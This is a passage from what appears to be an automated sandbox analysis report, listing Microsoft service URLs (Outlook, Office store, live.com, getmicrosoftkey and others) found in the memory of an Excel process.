    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netb
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000001.00000002.751578231.0000000012FAF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733824840.0000000012FAE000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com$k
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733824840.0000000012FAE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281291219.000000000F564000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com2;
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comon
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comonD:.c
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733824840.0000000012FAE000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733824840.0000000012FAE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281291219.000000000F564000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/=
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonpokiD
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookB
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryt
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.562031127.000000000F53B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598428723.000000000F531000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.739106606.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734406099.000000000F532000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.563181967.000000000F53B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281291219.000000000F564000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.750364994.000000000F53C000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.net-;
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsJ
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281565278.0000000013083000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281121315.0000000013080000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comX
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://settings.outlook.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.com&
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/re
    Source: EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recog
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://staging.cortana.ai
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://store.office.cn/addinstemplate
